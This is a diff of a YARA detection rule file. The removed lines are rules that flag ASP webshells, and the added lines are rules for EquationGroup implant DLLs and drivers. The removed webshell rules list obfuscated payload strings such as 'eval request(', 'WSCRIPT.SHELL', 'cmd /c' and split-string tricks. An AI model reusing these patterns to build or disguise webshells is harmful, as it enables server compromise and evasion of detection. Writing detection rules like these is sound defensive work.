-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L3467-L3658"
+		description = "EquationGroup Malware - file PortMap_Implant.dll"
+		author = "Auto Generated"
+		id = "662ee1cf-b837-5362-84a8-1af7335d5e1b"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1560-L1574"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3b7910a499c603715b083ddb6f881c1a0a3a924d"
-		hash = "990e3f129b8ba409a819705276f8fa845b95dad0"
-		hash = "22345e956bce23304f5e8e356c423cee60b0912c"
-		hash = "c84a6098fbd89bd085526b220d0a3f9ab505bcba"
-		hash = "b977c0ad20dc738b5dacda51ec8da718301a75d7"
-		hash = "c69df00b57fd127c7d4e0e2a40d2f6c3056e0af8bfb1925938060b7e0d8c630f"
-		hash = "f3b39a5da1cdde9acde077208e8e5b27feb973514dab7f262c7c6b2f8f11eaa7"
-		hash = "0e9d92807d990144c637d8b081a6a90a74f15c7337522874cf6317092ea2d7c1"
-		hash = "ebbc485e778f8e559ef9c66f55bb01dc4f5dcce9c31ccdd150e2c702c4b5d9e1"
-		hash = "44b4068bfbbb8961e16bae238ad23d181ac9c8e4fcb4b09a66bbcd934d2d39ee"
-		hash = "c5a4e188780b5513f34824904d56bf6e364979af6782417ccc5e5a8a70b4a95a"
-		hash = "41a3cc668517ec207c990078bccfc877e239b12a7ff2abe55ff68352f76e819c"
-		hash = "2faad5944142395794e5e6b90a34a6204412161f45e130aeb9c00eff764f65fc"
-		hash = "d0c5e641120b8ea70a363529843d9f393074c54af87913b3ab635189fb0c84cb"
-		hash = "28cfcfe28419a399c606bf96505bc68d6fe05624dba18306993f9fe0d398fbe1"
-		logic_hash = "1b969e098a0b2c86ceba9cbb7f31770ba04f1a4c225716ea27d7e4e4177c90c4"
+		logic_hash = "fcbc518d23dc21d482abcac29505c5404fc9e309554ca7dc9f1014adbff83e1a"
 		score = 75
-		quality = -117
+		quality = 85
+		tags = "FILE"
+		hash1 = "964762416840738b1235ed4ae479a4b117b8cdcc762a6737e83bc2062c0cf236"
+
+	strings:
+		$op1 = { 0c 2b ca 8a 04 11 3a 02 75 01 47 42 4e 75 f4 8b }
+		$op2 = { 14 83 c1 05 80 39 85 75 0c 80 79 01 c0 75 06 80 }
+		$op3 = { eb 3d 83 c0 06 33 f6 80 38 ff 75 2c 80 78 01 15 }
+
+	condition:
+		( uint16( 0 ) == 0x5a4d and filesize < 250KB and all of them )
+}
+rule SIGNATURE_BASE_Equationgroup_Equationdrug_Ntevt : FILE
+{
+	meta:
+		description = "EquationGroup Malware - file ntevt.sys"
+		author = "Florian Roth (Nextron Systems)"
+		id = "36d23adb-dafe-5e99-8976-b146ceca2f9b"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1577-L1591"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "c5259c89dfedc34ca032775bda4ead04985da6b3d042b8a6635f5f848570d8c6"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "45e5e1ea3456d7852f5c610c7f4447776b9f15b56df7e3a53d57996123e0cebf"
 
 	strings:
-		$susasp1 = "/*-/*-*/"
-		$susasp2 = "(\"%1"
-		$susasp3 = /[Cc]hr\([Ss]tr\(/
-		$susasp4 = "cmd.exe"
-		$susasp5 = "cmd /c"
-		$susasp7 = "FromBase64String"
-		$susasp8 = "UmVxdWVzdC"
-		$susasp9 = "cmVxdWVzdA"
-		$susasp10 = "/*//*/"
-		$susasp11 = "(\"/*/\""
-		$susasp12 = "eval(eval("
-		$fp1 = "eval a"
-		$fp2 = "'Eval'"
-		$fp3 = "Eval(\""
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
-		$asp_payload0 = "eval_r" fullword nocase wide ascii
-		$asp_payload1 = /\beval\s/ nocase wide ascii
-		$asp_payload2 = /\beval\(/ nocase wide ascii
-		$asp_payload3 = /\beval\"\"/ nocase wide ascii
-		$asp_payload4 = /:\s{0,10}eval\b/ nocase wide ascii
-		$asp_payload8 = /\bexecute\s?\(/ nocase wide ascii
-		$asp_payload9 = /\bexecute\s[\w"]/ nocase wide ascii
-		$asp_payload11 = "WSCRIPT.SHELL" fullword nocase wide ascii
-		$asp_payload13 = "ExecuteGlobal" fullword nocase wide ascii
-		$asp_payload14 = "ExecuteStatement" fullword nocase wide ascii
-		$asp_payload15 = "ExecuteStatement" fullword nocase wide ascii
-		$asp_multi_payload_one1 = "CreateObject" nocase fullword wide ascii
-		$asp_multi_payload_one2 = "addcode" fullword wide ascii
-		$asp_multi_payload_one3 = /\.run\b/ wide ascii
-		$asp_multi_payload_two1 = "CreateInstanceFromVirtualPath" fullword wide ascii
-		$asp_multi_payload_two2 = "ProcessRequest" fullword wide ascii
-		$asp_multi_payload_two3 = "BuildManager" fullword wide ascii
-		$asp_multi_payload_three1 = "System.Diagnostics" wide ascii
-		$asp_multi_payload_three2 = "Process" fullword wide ascii
-		$asp_multi_payload_three3 = ".Start" wide ascii
-		$asp_multi_payload_four1 = "CreateObject" fullword nocase wide ascii
-		$asp_multi_payload_four2 = "TransformNode" fullword nocase wide ascii
-		$asp_multi_payload_four3 = "loadxml" fullword nocase wide ascii
-		$asp_multi_payload_five1 = "ProcessStartInfo" fullword nocase wide ascii
-		$asp_multi_payload_five2 = ".Start" nocase wide ascii
-		$asp_multi_payload_five3 = ".Filename" nocase wide ascii
-		$asp_multi_payload_five4 = ".Arguments" nocase wide ascii
-		$asp_always_write1 = /\.write/ nocase wide ascii
-		$asp_always_write2 = /\.swrite/ nocase wide ascii
-		$asp_write_way_one2 = "SaveToFile" fullword nocase wide ascii
-		$asp_write_way_one3 = "CREAtEtExtFiLE" fullword nocase wide ascii
-		$asp_cr_write1 = "CreateObject(" nocase wide ascii
-		$asp_cr_write2 = "CreateObject (" nocase wide ascii
-		$asp_streamwriter1 = "streamwriter" fullword nocase wide ascii
-		$asp_streamwriter2 = "filestream" fullword nocase wide ascii
+		$s1 = "ntevt.sys" fullword ascii
+		$s2 = "c:\\ntevt.pdb" fullword ascii
 
 	condition:
-		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( ( any of ( $asp_payload* ) or all of ( $asp_multi_payload_one* ) or all of ( $asp_multi_payload_two* ) or all of ( $asp_multi_payload_three* ) or all of ( $asp_multi_payload_four* ) or all of ( $asp_multi_payload_five* ) ) or ( any of ( $asp_always_write* ) and ( any of ( $asp_write_way_one* ) and any of ( $asp_cr_write* ) ) or ( any of ( $asp_streamwriter* ) ) ) ) and not any of ( $fp* ) and ( filesize < 200 or ( filesize < 1000 and any of ( $susasp* ) ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_Encoded : FILE
+rule SIGNATURE_BASE_Equationgroup_Nethide_Implant : FILE
 {
 	meta:
-		description = "Webshell in VBscript or JScript encoded using *.Encode plus a suspicious string"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "67c0e1f6-6da5-569c-ab61-8b8607429471"
-		date = "2021-03-14"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L3660-L3770"
+		description = "EquationGroup Malware - file nethide_Implant.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "36559b69-1718-5d9b-8d6f-3db4becba0c4"
+		date = "2017-01-13"
+		modified = "2023-01-27"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1593-L1608"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1bc7327f9d3dbff488e5b0b69a1b39dcb99b3399"
-		hash = "9885ee1952b5ad9f84176c9570ad4f0e32461c92"
-		hash = "27a020c5bc0dbabe889f436271df129627b02196"
-		hash = "f41f8c82b155c3110fc1325e82b9ee92b741028b"
-		hash = "af40f4c36e3723236c59dc02f28a3efb047d67dd"
-		logic_hash = "dc33423874a49edfe9994db50959e6a55e2d475f4cd7d0b1b0a288c4ee1f7961"
+		logic_hash = "bd25d05b001ac7d41e60270b62aeecd520a570e76557c68d78d9680c7beb90ab"
 		score = 75
-		quality = -24
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "b2daf9058fdc5e2affd5a409aebb90343ddde4239331d3de8edabeafdb3a48fa"
 
 	strings:
-		$encoded1 = "VBScript.Encode" nocase wide ascii
-		$encoded2 = "JScript.Encode" nocase wide ascii
-		$data1 = "#@~^" wide ascii
-		$sus1 = "shell" nocase wide ascii
-		$sus2 = "cmd" fullword wide ascii
-		$sus3 = "password" fullword wide ascii
-		$sus4 = "UserPass" fullword wide ascii
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
+		$s1 = "\\\\.\\dlcndi" fullword ascii
+		$s2 = "s\\drivers\\" wide
 
 	condition:
-		filesize < 500KB and ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and any of ( $encoded* ) and any of ( $data* ) and ( any of ( $sus* ) or ( filesize < 20KB and #data1 > 4 ) or ( filesize < 700 and #data1 > 0 ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 90KB and all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_Encoded_Aspcoding : FILE
+rule SIGNATURE_BASE_Equationgroup_Equationdrug_Gen_4 : FILE
 {
 	meta:
-		description = "ASP Webshell encoded using ASPEncodeDLL.AspCoding"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "788a8dae-bcb8-547c-ba17-e1f14bc28f34"
-		date = "2021-03-14"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L3772-L3878"
+		description = "EquationGroup Malware - file PC_Level4_flav_dll"
+		author = "Auto Generated"
+		id = "e3fc376b-f7cc-5dfa-bcf4-4991962a4cf9"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1610-L1624"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "3046cbfa4b4f5eb5d0efc1b2b658567391b0c219650437088a0d6c179e9235fb"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		hash1 = "227faeb770ba538fb85692b3dfcd00f76a0a5205d1594bd0969a1e535ee90ee1"
+
+	strings:
+		$op1 = { 11 8b da 23 df 8d 1c 9e c1 fb 02 33 da 23 df 33 }
+		$op2 = { c3 0c 57 8b 3b eb 27 8b f7 83 7e 08 00 8b 3f 74 }
+		$op3 = { 00 0f b7 5e 14 8d 5c 33 18 8b c3 2b 45 08 50 ff }
+
+	condition:
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+}
+rule SIGNATURE_BASE_Equationgroup_Equationdrug_Tdi6 : FILE
+{
+	meta:
+		description = "EquationGroup Malware - file tdi6.sys"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c6dbc28a-ec52-5256-afff-ab15ed1b90a6"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1626-L1642"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "ba7e14a3bf158795ecee498976847fbbcc80635799be4574f05aa80d1a85a4ef"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "12c082f74c0916a0e926488642236de3a12072a18d29c97bead15bb301f4b3f8"
+
+	strings:
+		$s1 = "tdi6.sys" fullword wide
+		$s3 = "TDI IPv6 Wrapper" fullword wide
+		$s5 = "Corporation. All rights reserved." fullword wide
+		$s6 = "FailAction" fullword wide
+
+	condition:
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+}
+rule SIGNATURE_BASE_Equationgroup_Modifyauthentication_Implant : FILE
+{
+	meta:
+		description = "EquationGroup Malware - file modifyAuthentication_Implant.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "990035c5-cd9c-59e0-b244-e2caafd2561f"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1644-L1661"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7cfd184ab099c4d60b13457140493b49c8ba61ee"
-		hash = "f5095345ee085318235c11ae5869ae564d636a5342868d0935de7582ba3c7d7a"
-		logic_hash = "a0f0b8585b28b13a90c5d112997cacea00af8c89c81eda5edf05508ad41459ab"
-		score = 60
-		quality = -5
+		logic_hash = "8bdc4c9e9a3e327bb55781670d8f373d5a8904ccd47cc4b67673c47a76c54927"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "e1dff24af5bfc991dca21b4e3a19ffbc069176d674179eef691afc6b1ac6f805"
 
 	strings:
-		$encoded1 = "ASPEncodeDLL" fullword nocase wide ascii
-		$encoded2 = ".Runt" nocase wide ascii
-		$encoded3 = "Request" fullword nocase wide ascii
-		$encoded4 = "Response" fullword nocase wide ascii
-		$data1 = "AspCoding.EnCode" wide ascii
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
+		$s1 = "LSASS.EXE" fullword wide
+		$s2 = "hsamsrv.dll" fullword ascii
+		$s3 = "hZwOpenProcess" fullword ascii
+		$s4 = "hOpenProcess" fullword ascii
+		$s5 = ".?AVFeFinallyFailure@@" fullword ascii
 
 	condition:
-		filesize < 500KB and ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and all of ( $encoded* ) and any of ( $data* )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_By_String : FILE
+rule SIGNATURE_BASE_Equationgroup_Ntfltmgr : FILE
 {
 	meta:
-		description = "Known ASP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions."
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "4705b28b-2ffa-53d1-b727-1a9fc2a7dd69"
-		date = "2021-01-13"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L3880-L4058"
+		description = "EquationGroup Malware - file ntfltmgr.sys"
+		author = "Florian Roth (Nextron Systems)"
+		id = "dd7fd371-a097-5df5-9ffd-89babbadee96"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1663-L1679"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f72252b13d7ded46f0a206f63a1c19a66449f216"
-		hash = "bd75ac9a1d1f6bcb9a2c82b13ea28c0238360b3a7be909b2ed19d3c96e519d3d"
-		hash = "56a54fe1f8023455800fd0740037d806709ffb9ece1eb9e7486ad3c3e3608d45"
-		hash = "4ef5d8b51f13b36ce7047e373159d7bb42ca6c9da30fad22e083ab19364c9985"
-		hash = "e90c3c270a44575c68d269b6cf78de14222f2cbc5fdfb07b9995eb567d906220"
-		hash = "8a38835f179e71111663b19baade78cc3c9e1f6fcc87eb35009cbd09393cbc53"
-		hash = "f2883e9461393b33feed4139c0fc10fcc72ff92924249eb7be83cb5b76f0f4ee"
-		hash = "10cca59c7112dfb1c9104d352e0504f842efd4e05b228b6f34c2d4e13ffd0eb6"
-		hash = "ed179e5d4d365b0332e9ffca83f66ee0afe1f1b5ac3c656ccd08179170a4d9f7"
-		hash = "ce3273e98e478a7e95fccce0a3d3e8135c234a46f305867f2deacd4f0efa7338"
-		hash = "65543373b8bd7656478fdf9ceeacb8490ff8976b1fefc754cd35c89940225bcf"
-		hash = "de173ea8dcef777368089504a4af0804864295b75e51794038a6d70f2bcfc6f5"
-		logic_hash = "b6ff83bc501753b893a0f5e60c6aafa292617279c0855ce3ba2d0b9b73325e8a"
+		logic_hash = "3e931088f363c7dfb6057019faf9e5c674c90f6bdae6211dcc871464b410efd3"
 		score = 75
-		quality = -41
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "f7a886ee10ee6f9c6be48c20f370514be62a3fd2da828b0dff44ff3d485ff5c5"
 
 	strings:
-		$asp_string1 = "tseuqer lave" wide ascii
-		$asp_string2 = ":eval request(" wide ascii
-		$asp_string3 = ":eval request(" wide ascii
-		$asp_string4 = "SItEuRl=\"http://www.zjjv.com\"" wide ascii
-		$asp_string5 = "ServerVariables(\"HTTP_HOST\"),\"gov.cn\"" wide ascii
-		$asp_string6 = /e\+.-v\+.-a\+.-l/ wide ascii
-		$asp_string7 = "r+x-e+x-q+x-u" wide ascii
-		$asp_string8 = "add6bb58e139be10" fullword wide ascii
-		$asp_string9 = "WebAdmin2Y.x.y(\"" wide ascii
-		$asp_string10 = "<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request[" wide ascii
-		$asp_string11 = "<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request(" wide ascii
-		$asp_string12 = "UmVxdWVzdC5JdGVtWyJ" wide ascii
-		$asp_string13 = "UAdgBhAGwAKA" wide ascii
-		$asp_string14 = "lAHYAYQBsACgA" wide ascii
-		$asp_string15 = "ZQB2AGEAbAAoA" wide ascii
-		$asp_string16 = "IAZQBxAHUAZQBzAHQAKA" wide ascii
-		$asp_string17 = "yAGUAcQB1AGUAcwB0ACgA" wide ascii
-		$asp_string18 = "cgBlAHEAdQBlAHMAdAAoA" wide ascii
-		$asp_string19 = "\"ev\"&\"al" wide ascii
-		$asp_string20 = "\"Sc\"&\"ri\"&\"p" wide ascii
-		$asp_string21 = "C\"&\"ont\"&\"" wide ascii
-		$asp_string22 = "\"vb\"&\"sc" wide ascii
-		$asp_string23 = "\"A\"&\"do\"&\"d" wide ascii
-		$asp_string24 = "St\"&\"re\"&\"am\"" wide ascii
-		$asp_string25 = "*/eval(" wide ascii
-		$asp_string26 = "\"e\"&\"v\"&\"a\"&\"l" nocase
-		$asp_string27 = "<%eval\"\"&(\"" nocase wide ascii
-		$asp_string28 = "6877656D2B736972786677752B237E232C2A" wide ascii
-		$asp_string29 = "ws\"&\"cript.shell" wide ascii
-		$asp_string30 = "SerVer.CreAtEoBjECT(\"ADODB.Stream\")" wide ascii
-		$asp_string31 = "ASPShell - web based shell" wide ascii
-		$asp_string32 = "<++ CmdAsp.asp ++>" wide ascii
-		$asp_string33 = "\"scr\"&\"ipt\"" wide ascii
-		$asp_string34 = "Regex regImg = new Regex(\"[a-z|A-Z]{1}:\\\\\\\\[a-z|A-Z| |0-9|\\u4e00-\\u9fa5|\\\\~|\\\\\\\\|_|{|}|\\\\.]*\");" wide ascii
-		$asp_string35 = "\"she\"&\"ll." wide ascii
-		$asp_string36 = "LH\"&\"TTP" wide ascii
-		$asp_string37 = "<title>Web Sniffer</title>" wide ascii
-		$asp_string38 = "<title>WebSniff" wide ascii
-		$asp_string39 = "cript\"&\"ing" wide ascii
-		$asp_string40 = "tcejbOmetsySeliF.gnitpircS" wide ascii
-		$asp_string41 = "tcejbOetaerC.revreS" wide ascii
-		$asp_string42 = "This file is part of A Black Path Toward The Sun (\"ABPTTS\")" wide ascii
-		$asp_string43 = "if ((Request.Headers[headerNameKey] != null) && (Request.Headers[headerNameKey].Trim() == headerValueKey.Trim()))" wide ascii
-		$asp_string44 = "if (request.getHeader(headerNameKey).toString().trim().equals(headerValueKey.trim()))" wide ascii
-		$asp_string45 = "Response.Write(Server.HtmlEncode(ExcutemeuCmd(txtArg.Text)));" wide ascii
-		$asp_string46 = "\"c\" + \"m\" + \"d\"" wide ascii
-		$asp_string47 = "\".\"+\"e\"+\"x\"+\"e\"" wide ascii
-		$asp_string48 = "Tas9er" fullword wide ascii
-		$asp_string49 = "<%@ Page Language=\"\\u" wide ascii
-		$asp_string50 = "BinaryRead(\\u" wide ascii
-		$asp_string51 = "Request.\\u" wide ascii
-		$asp_string52 = "System.Buffer.\\u" wide ascii
-		$asp_string53 = "System.Net.\\u" wide ascii
-		$asp_string54 = ".\\u0052\\u0065\\u0066\\u006c\\u0065\\u0063\\u0074\\u0069\\u006f\\u006e\"" wide ascii
-		$asp_string55 = "\\u0041\\u0073\\u0073\\u0065\\u006d\\u0062\\u006c\\u0079.\\u004c\\u006f\\u0061\\u0064" wide ascii
-		$asp_string56 = "\\U00000052\\U00000065\\U00000071\\U00000075\\U00000065\\U00000073\\U00000074[\"" wide ascii
-		$asp_string57 = "*/\\U0000" wide ascii
-		$asp_string58 = "\\U0000FFFA" wide ascii
-		$asp_string59 = "\"e45e329feb5d925b\"" wide ascii
-		$asp_string60 = ">POWER!shelled<" wide ascii
-		$asp_string61 = "@requires xhEditor" wide ascii
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
+		$s1 = "ntfltmgr.sys" fullword wide
+		$s2 = "ntfltmgr.pdb" fullword ascii
+		$s4 = "Network Filter Manager" fullword wide
